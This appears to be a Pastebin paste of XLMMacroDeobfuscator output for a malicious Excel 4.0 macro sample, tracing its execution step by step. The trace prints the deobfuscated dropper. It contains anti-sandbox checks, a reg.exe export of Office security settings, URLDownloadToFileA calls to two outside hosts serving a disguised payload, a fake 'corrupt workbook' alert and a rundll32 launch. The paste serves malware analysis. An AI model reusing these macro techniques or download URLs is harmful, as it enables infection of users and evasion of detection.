API tools faq
paste
Advertisement
dissectmalware

Malware - XLM

dissectmalware
Dec 11th, 2020
397
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 17.18 KB | None | 0 0
raw download clone embed print report
  1. C:\Users\user\AppData\Local\Programs\Python\Python36-32\python.exe C:/Users/user/Downloads/last/XLMMacroDeobfuscator_new/XLMMacroDeobfuscator/deobfuscator.py -f C:\Users\user\Downloads\samples\xlm\6f6ba7e59949cd4869f4cd3d63d556b86313b7e42d2030546426efbef20ee2c1.xls
  2.  
  3. _ _______
  4. |\ /|( \ ( )
  5. ( \ / )| ( | () () |
  6. \ (_) / | | | || || |
  7. ) _ ( | | | |(_)| |
  8. / ( ) \ | | | | | |
  9. ( / \ )| (____/\| ) ( |
  10. |/ \|(_______/|/ \|
  11. ______ _______ _______ ______ _______ _______ _______ _______ _________ _______ _______
  12. ( __ \ ( ____ \( ___ )( ___ \ ( ____ \|\ /|( ____ \( ____ \( ___ )\__ __/( ___ )( ____ )
  13. | ( \ )| ( \/| ( ) || ( ) )| ( \/| ) ( || ( \/| ( \/| ( ) | ) ( | ( ) || ( )|
  14. | | ) || (__ | | | || (__/ / | (__ | | | || (_____ | | | (___) | | | | | | || (____)|
  15. | | | || __) | | | || __ ( | __) | | | |(_____ )| | | ___ | | | | | | || __)
  16. | | ) || ( | | | || ( \ \ | ( | | | | ) || | | ( ) | | | | | | || (\ (
  17. | (__/ )| (____/\| (___) || )___) )| ) | (___) |/\____) || (____/\| ) ( | | | | (___) || ) \ \__
  18. (______/ (_______/(_______)|/ \___/ |/ (_______)\_______)(_______/|/ \| )_( (_______)|/ \__/
  19.  
  20.  
  21. XLMMacroDeobfuscator(v0.1.6) - https://github.com/DissectMalware/XLMMacroDeobfuscator
  22.  
  23. File: C:\Users\user\Downloads\samples\xlm\6f6ba7e59949cd4869f4cd3d63d556b86313b7e42d2030546426efbef20ee2c1.xls
  24.  
  25. Unencrypted xls file
  26.  
  27. [Loading Cells]
  28. auto_open: auto_open->'Sheet2'!$FS$52964
  29. [Starting Deobfuscation]
  30. CELL:FS52964 , FullEvaluation , SET.VALUE(GM52449,392)
  31. CELL:FS52965 , FullEvaluation , GOTO(CV24412)
  32. CELL:CV24412 , FullEvaluation , SET.VALUE(GQ44156,339)
  33. CELL:CV24413 , FullEvaluation , GOTO(GZ14878)
  34. CELL:GZ14878 , FullEvaluation , SET.VALUE(HG1271,1532)
  35. CELL:GZ14879 , FullEvaluation , GOTO(CJ53865)
  36. CELL:CJ53865 , FullEvaluation , SET.VALUE(AC30333,35.75)
  37. CELL:CJ53866 , FullEvaluation , GOTO(HO45111)
  38. CELL:HO45111 , FullEvaluation , SET.VALUE(CS46407,22)
  39. CELL:HO45112 , FullEvaluation , GOTO(GX48167)
  40. CELL:GX48167 , FullEvaluation , SET.VALUE(CI12245,-59)
  41. CELL:GX48168 , FullEvaluation , RUN(Sheet2!GG37317)
  42. CELL:GG37317 , FullEvaluation , SET.VALUE(U1115,-59)
  43. CELL:GG37318 , FullEvaluation , GOTO(BS37166)
  44. CELL:BS37166 , FullEvaluation , SET.VALUE(CN63602,-406)
  45. CELL:BS37167 , FullEvaluation , GOTO(X1129)
  46. CELL:X1129 , FullEvaluation , SET.VALUE(BH34689,127)
  47. CELL:X1130 , FullEvaluation , RUN(Sheet2!HV59960)
  48. CELL:HV59960 , FullEvaluation , SET.VALUE(BK21897,-353.7)
  49. CELL:HV59961 , FullEvaluation , RUN(Sheet2!GP29734)
  50. CELL:GP29734 , FullEvaluation , FORMULA("=CLOSE(FALSE)",FK4625)
  51. CELL:GP29735 , FullEvaluation , GOTO(EW24092)
  52. CELL:EW24092 , FullEvaluation , FORMULA("=APP.MAXIMIZE()",EW24093)
  53. CELL:EW24093 , FullEvaluation , 0
  54. CELL:EW24094 , FullEvaluation , GOTO(IK5437)
  55. CELL:IK5437 , FullEvaluation , FORMULA("=IF(GET.WINDOW(7),GOTO(R[-813]C[-78]),)",IK5438)
  56. CELL:IK5438 , FullEvaluation , IF(GET.WINDOW(7),GOTO(R[-813]C[-78]),)
  57. CELL:IK5439 , FullEvaluation , GOTO(HS48810)
  58. CELL:HS48810 , FullEvaluation , FORMULA("=IF(GET.WINDOW(20),,GOTO(R[-44186]C[-60]))",HS48811)
  59. CELL:HS48811 , FullEvaluation , IF(GET.WINDOW(20),,GOTO(R[-44186]C[-60]))
  60. CELL:HS48812 , FullEvaluation , RUN(Sheet2!HL61953)
  61. CELL:HL61953 , FullEvaluation , FORMULA("=IF(GET.WINDOW(23)<3,GOTO(R[-57329]C[-53]),)",HL61954)
  62. CELL:HL61954 , FullEvaluation , IF(GET.WINDOW(23)<3,GOTO(R[-57329]C[-53]),)
  63. CELL:HL61955 , FullEvaluation , GOTO(FT3448)
  64. CELL:FT3448 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(31),GOTO(R[1176]C[-9]),)",FT3449)
  65. CELL:FT3449 , FullEvaluation , IF(GET.WORKSPACE(31),GOTO(R[1176]C[-9]),)
  66. CELL:FT3450 , FullEvaluation , RUN(Sheet2!IL4383)
  67. CELL:IL4383 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(13)<770,GOTO(R[241]C[-79]),)",IL4384)
  68. CELL:IL4384 , FullEvaluation , IF(GET.WORKSPACE(13)<770,GOTO(R[241]C[-79]),)
  69. CELL:IL4385 , FullEvaluation , RUN(Sheet2!IC43412)
  70. CELL:IC43412 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(14)<390,GOTO(R[-38788]C[-70]),)",IC43413)
  71. CELL:IC43413 , FullEvaluation , IF(GET.WORKSPACE(14)<390,GOTO(R[-38788]C[-70]),)
  72. CELL:IC43414 , FullEvaluation , GOTO(AU41565)
  73. CELL:AU41565 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(19),,GOTO(R[-36941]C[120]))",AU41566)
  74. CELL:AU41566 , FullEvaluation , IF(GET.WORKSPACE(19),,GOTO(R[-36941]C[120]))
  75. CELL:AU41567 , FullEvaluation , RUN(Sheet2!AB17079)
  76. CELL:AB17079 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(42),,GOTO(R[-12455]C[139]))",AB17080)
  77. CELL:AB17080 , FullEvaluation , IF(GET.WORKSPACE(42),,GOTO(R[-12455]C[139]))
  78. CELL:AB17081 , FullEvaluation , GOTO(IB27416)
  79. CELL:IB27416 , FullEvaluation , FORMULA("=IF(ISNUMBER(SEARCH(""Windows"",GET.WORKSPACE(1))),,GOTO(R[-22792]C[-69]))",IB27417)
  80. CELL:IB27417 , FullBranching , IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))),,GOTO(R[-22792]C[-69]))
  81. CELL:IB27417 , FullEvaluation , [TRUE]
  82. CELL:IB27418 , FullEvaluation , RUN(Sheet2!ED65281)
  83. CELL:ED65281 , FullEvaluation , FORMULA("=""EXPORT HKCU\Software\Microsoft\Office\""",EN14779)
  84. CELL:ED65282 , FullEvaluation , GOTO(IR35245)
  85. CELL:IR35245 , FullEvaluation , FORMULA("=""C:\Users\Public\0tDOFd.reg""",HQ57664)
  86. CELL:IR35246 , FullEvaluation , GOTO(DW28906)
  87. CELL:DW28906 , FullEvaluation , FORMULA("=R[2390]C[112]&GET.WORKSPACE(2)&""\Excel\Security ""&R[45275]C[193]&"" /y""",AF12389)
  88. CELL:DW28907 , FullEvaluation , GOTO(G52328)
  89. CELL:G52328 , FullEvaluation , FORMULA("=""C:\Windows\system32\reg.exe""",AJ12831)
  90. CELL:G52329 , FullEvaluation , GOTO(GR56472)
  91. CELL:GR56472 , FullEvaluation , FORMULA("=CALL(""Shell32"",""ShellExecuteA"",""JJCCCJJ"",0,""open"",R[-43642]C[-164],R[-44084]C[-168],0,5)",GR56473)
  92. CELL:GR56473 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\reg.exe","EXPORT HKCU\Software\Microsoft\Office\GET.WORKSPACE(2)\Excel\Security C:\Users\Public\0tDOFd.reg /y",0,5)
  93. CELL:GR56474 , FullEvaluation , GOTO(BI831)
  94. CELL:BI831 , FullEvaluation , FORMULA("=WHILE(ISERROR(FILES(R[56830]C[164])))",BI834)
  95. CELL:BI832 , FullEvaluation , FORMULA("=WAIT(NOW()+""00:00:01"")",BI835)
  96. CELL:BI833 , FullEvaluation , FORMULA("=NEXT()",BI836)
  97. CELL:BI834 , PartialEvaluation , WHILE(ISERROR(FILES(R[56830]C[164])))
  98. CELL:BI837 , FullEvaluation , RUN(Sheet2!HX58625)
  99. CELL:HX58625 , FullEvaluation , FORMULA("=FOPEN(R[-962]C[-7])",HX58626)
  100. CELL:HX58626 , FullEvaluation , FOPEN("C:\Users\Public\0tDOFd.reg",1)
  101. CELL:HX58627 , FullEvaluation , RUN(Sheet2!H59022)
  102. CELL:H59022 , FullEvaluation , FORMULA("=FPOS(R[-397]C[224],215)",H59023)
  103. CELL:H59023 , PartialEvaluation , FPOS("C:\Users\Public\0tDOFd.reg",215)
  104. CELL:H59024 , FullEvaluation , RUN(Sheet2!HN6157)
  105. CELL:HN6157 , FullEvaluation , FORMULA("=FREAD(R[52468]C[10],255)",HN6158)
  106. CELL:HN6158 , PartialEvaluation , FREAD("C:\Users\Public\0tDOFd.reg",255)
  107. CELL:HN6159 , FullEvaluation , GOTO(M12701)
  108. CELL:M12701 , FullEvaluation , FORMULA("=FCLOSE(R[45924]C[219])",M12702)
  109. CELL:M12702 , PartialEvaluation , FCLOSE("C:\Users\Public\0tDOFd.reg")
  110. CELL:M12703 , FullEvaluation , GOTO(HS19468)
  111. CELL:HS19468 , FullEvaluation , FORMULA("=FILE.DELETE(R[38195]C[-2])",HS19469)
  112. CELL:HS19469 , PartialEvaluation , FILE.DELETE("C:\Users\Public\0tDOFd.reg")
  113. CELL:HS19470 , FullEvaluation , RUN(Sheet2!IP58689)
  114. CELL:IP58689 , FullEvaluation , FORMULA("=IF(ISNUMBER(SEARCH(""0001"",R[-52532]C[-28])),GOTO(R[-54065]C[-83]),)",IP58690)
  115. CELL:IP58690 , FullBranching , IF(ISNUMBER(SEARCH("0001",R[-52532]C[-28])),GOTO(R[-54065]C[-83]),)
  116. CELL:IP58690 , FullEvaluation , [TRUE] GOTO(R[-54065]C[-83])
  117. CELL:FK4625 , End , CLOSE(FALSE)
  118. CELL:IP58690 , FullEvaluation , [FALSE]
  119. CELL:IP58691 , FullEvaluation , GOTO(IB46729)
  120. CELL:IB46729 , FullEvaluation , FORMULA("=""C:\Users\Public\Gqjxs.html""",GS57755)
  121. CELL:IB46730 , FullEvaluation , GOTO(CD35438)
  122. CELL:CD35438 , FullEvaluation , FORMULA("=""https://docs.microsoft.com/en-us/officeupdates/office-msi-non-security-updates""",EL60834)
  123. CELL:CD35439 , FullEvaluation , GOTO(CD16194)
  124. CELL:CD16194 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R[44639]C[60],R[41560]C[119],0,0)",CD16195)
  125. CELL:CD16195 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://docs.microsoft.com/en-us/officeupdates/office-msi-non-security-updates","C:\Users\Public\Gqjxs.html",0,0)
  126. CELL:CD16196 , FullEvaluation , GOTO(GD27718)
  127. CELL:GD27718 , FullEvaluation , FORMULA("=FILES(R[30036]C[15])",GD27719)
  128. CELL:GD27719 , PartialEvaluation , FILES("C:\Users\Public\Gqjxs.html")
  129. CELL:GD27720 , FullEvaluation , RUN(Sheet2!HU9549)
  130. CELL:HU9549 , FullEvaluation , FORMULA("=IF(ISERROR(R[18169]C[-43]),GOTO(R[-4925]C[-62]),)",HU9550)
  131. CELL:HU9550 , FullBranching , IF(ISERROR(R[18169]C[-43]),GOTO(R[-4925]C[-62]),)
  132. CELL:HU9550 , FullEvaluation , [TRUE] GOTO(R[-4925]C[-62])
  133. CELL:FK4625 , End , CLOSE(FALSE)
  134. CELL:HU9550 , FullEvaluation , [FALSE]
  135. CELL:HU9551 , FullEvaluation , GOTO(BH42792)
  136. CELL:BH42792 , FullEvaluation , SET.VALUE(CN33795,84)
  137. CELL:BH42793 , FullEvaluation , RUN(Sheet2!HH59901)
  138. CELL:HH59901 , FullEvaluation , SET.VALUE(DO31023,442)
  139. CELL:HH59902 , FullEvaluation , GOTO(FU9050)
  140. CELL:FU9050 , FullEvaluation , SET.VALUE(DW59946,36.8)
  141. CELL:FU9051 , FullEvaluation , RUN(Sheet2!CC60398)
  142. CELL:CC60398 , FullEvaluation , SET.VALUE(G42604,361)
  143. CELL:CC60399 , FullEvaluation , GOTO(IJ44508)
  144. CELL:IJ44508 , FullEvaluation , SET.VALUE(GB18553,484)
  145. CELL:IJ44509 , FullEvaluation , GOTO(GI32034)
  146. CELL:GI32034 , FullEvaluation , SET.VALUE(CW23831,-135.5)
  147. CELL:GI32035 , FullEvaluation , GOTO(D14697)
  148. CELL:D14697 , FullEvaluation , SET.VALUE(C63268,494)
  149. CELL:D14698 , FullEvaluation , GOTO(AZ42808)
  150. CELL:AZ42808 , FullEvaluation , SET.VALUE(F39004,235)
  151. CELL:AZ42809 , FullEvaluation , RUN(Sheet2!EB31800)
  152. CELL:EB31800 , FullEvaluation , SET.VALUE(GO1841,-203)
  153. CELL:EB31801 , FullEvaluation , GOTO(EG40361)
  154. CELL:EG40361 , FullEvaluation , SET.VALUE(AA4633,11)
  155. CELL:EG40362 , FullEvaluation , GOTO(IB20858)
  156. CELL:IB20858 , FullEvaluation , FORMULA("=""C:\Users\Public\8Z6V7u6.html""",BW44469)
  157. CELL:IB20859 , FullEvaluation , GOTO(DG24068)
  158. CELL:DG24068 , FullEvaluation , FORMULA("=""http://almakaaseb.com/wp-content/uploads/2020/05/wp-front.php""",BO49765)
  159. CELL:DG24069 , FullEvaluation , GOTO(ES45654)
  160. CELL:ES45654 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R[37426]C[-87],R[32130]C[-79],0,0)",EX12339)
  161. CELL:ES45655 , FullEvaluation , RUN(Sheet2!DB59619)
  162. CELL:DB59619 , FullEvaluation , FORMULA("=FILES(R[27419]C[-152])",HS17050)
  163. CELL:DB59620 , FullEvaluation , GOTO(CH38558)
  164. CELL:CH38558 , FullEvaluation , FORMULA("=IF(ISERROR(R[-24582]C[39]),,RUN(R[-36862]C[-17]))",GF41632)
  165. CELL:CH38559 , FullEvaluation , RUN(Sheet2!FE42412)
  166. CELL:FE42412 , FullEvaluation , FORMULA("=""https://neebank.com/wp-content/uploads/2020/05/wp-front.php""",AM24439)
  167. CELL:FE42413 , FullEvaluation , RUN(Sheet2!GL58286)
  168. CELL:GL58286 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R[-28190]C[-188],R[-8160]C[-152],0,0)",HS52629)
  169. CELL:GL58287 , FullEvaluation , RUN(Sheet2!D8257)
  170. CELL:D8257 , FullEvaluation , FORMULA("=""The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.""",FK27640)
  171. CELL:D8258 , FullEvaluation , GOTO(H50016)
  172. CELL:H50016 , FullEvaluation , FORMULA("=ALERT(R[22870]C[-4])",FO4770)
  173. CELL:H50017 , FullEvaluation , GOTO(FK5361)
  174. CELL:FK5361 , FullEvaluation , FORMULA("=""C:\Windows\system32\rundll32.exe""",BP21468)
  175. CELL:FK5362 , FullEvaluation , GOTO(HY30127)
  176. CELL:HY30127 , FullEvaluation , FORMULA("=R[24931]C[-64]&"",DllRegisterServer""",EI19538)
  177. CELL:HY30128 , FullEvaluation , GOTO(ES22445)
  178. CELL:ES22445 , FullEvaluation , FORMULA("=CALL(""Shell32"",""ShellExecuteA"",""JJCCCJJ"",0,""open"",R[2101]C[-9],R[171]C[62],0,5)",BY19367)
  179. CELL:ES22446 , FullEvaluation , RUN(Sheet2!EX12339)
  180. CELL:EX12339 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"http://almakaaseb.com/wp-content/uploads/2020/05/wp-front.php","C:\Users\Public\8Z6V7u6.html",0,0)
  181. CELL:EX12340 , FullEvaluation , GOTO(HS17050)
  182. CELL:HS17050 , PartialEvaluation , FILES("C:\Users\Public\8Z6V7u6.html")
  183. CELL:HS17051 , FullEvaluation , GOTO(GF41632)
  184. CELL:GF41632 , FullBranching , IF(ISERROR(R[-24582]C[39]),,RUN(R[-36862]C[-17]))
  185. CELL:GF41632 , FullEvaluation , [TRUE]
  186. CELL:GF41633 , FullEvaluation , GOTO(AM24439)
  187. CELL:AM24439 , FullEvaluation , "https://neebank.com/wp-content/uploads/2020/05/wp-front.php"
  188. CELL:AM24440 , FullEvaluation , RUN(Sheet2!HS52629)
  189. CELL:HS52629 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://neebank.com/wp-content/uploads/2020/05/wp-front.php","C:\Users\Public\8Z6V7u6.html",0,0)
  190. CELL:HS52630 , FullEvaluation , RUN(Sheet2!FK27640)
  191. CELL:FK27640 , FullEvaluation , "The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."
  192. CELL:FK27641 , FullEvaluation , RUN(Sheet2!FO4770)
  193. CELL:FO4770 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.")
  194. CELL:FO4771 , FullEvaluation , GOTO(BP21468)
  195. CELL:BP21468 , FullEvaluation , "C:\Windows\system32\rundll32.exe"
  196. CELL:BP21469 , FullEvaluation , GOTO(EI19538)
  197. CELL:EI19538 , FullEvaluation , "C:\Users\Public\8Z6V7u6.html,DllRegisterServer"
  198. CELL:EI19539 , FullEvaluation , GOTO(BY19367)
  199. CELL:BY19367 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","C:\Users\Public\8Z6V7u6.html,DllRegisterServer",0,5)
  200. CELL:BY19368 , FullEvaluation , GOTO(FK4625)
  201. CELL:FK4625 , End , CLOSE(FALSE)
  202. CELL:GF41632 , FullEvaluation , [FALSE] RUN(Sheet2!FO4770)
  203. CELL:FO4770 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.")
  204. CELL:FO4771 , FullEvaluation , GOTO(BP21468)
  205. CELL:BP21468 , FullEvaluation , "C:\Windows\system32\rundll32.exe"
  206. CELL:BP21469 , FullEvaluation , GOTO(EI19538)
  207. CELL:EI19538 , FullEvaluation , "C:\Users\Public\8Z6V7u6.html,DllRegisterServer"
  208. CELL:EI19539 , FullEvaluation , GOTO(BY19367)
  209. CELL:BY19367 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","C:\Users\Public\8Z6V7u6.html,DllRegisterServer",0,5)
  210. CELL:BY19368 , FullEvaluation , GOTO(FK4625)
  211. CELL:FK4625 , End , CLOSE(FALSE)
  212. CELL:IB27417 , FullEvaluation , [FALSE] GOTO(R[-22792]C[-69])
  213. CELL:FK4625 , End , CLOSE(FALSE)
  214.  
  215. Files:
  216.  
  217. [END of Deobfuscation]
  218. time elapsed: 6.9357006549835205
  219.  
  220. Process finished with exit code 0
  221.  
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!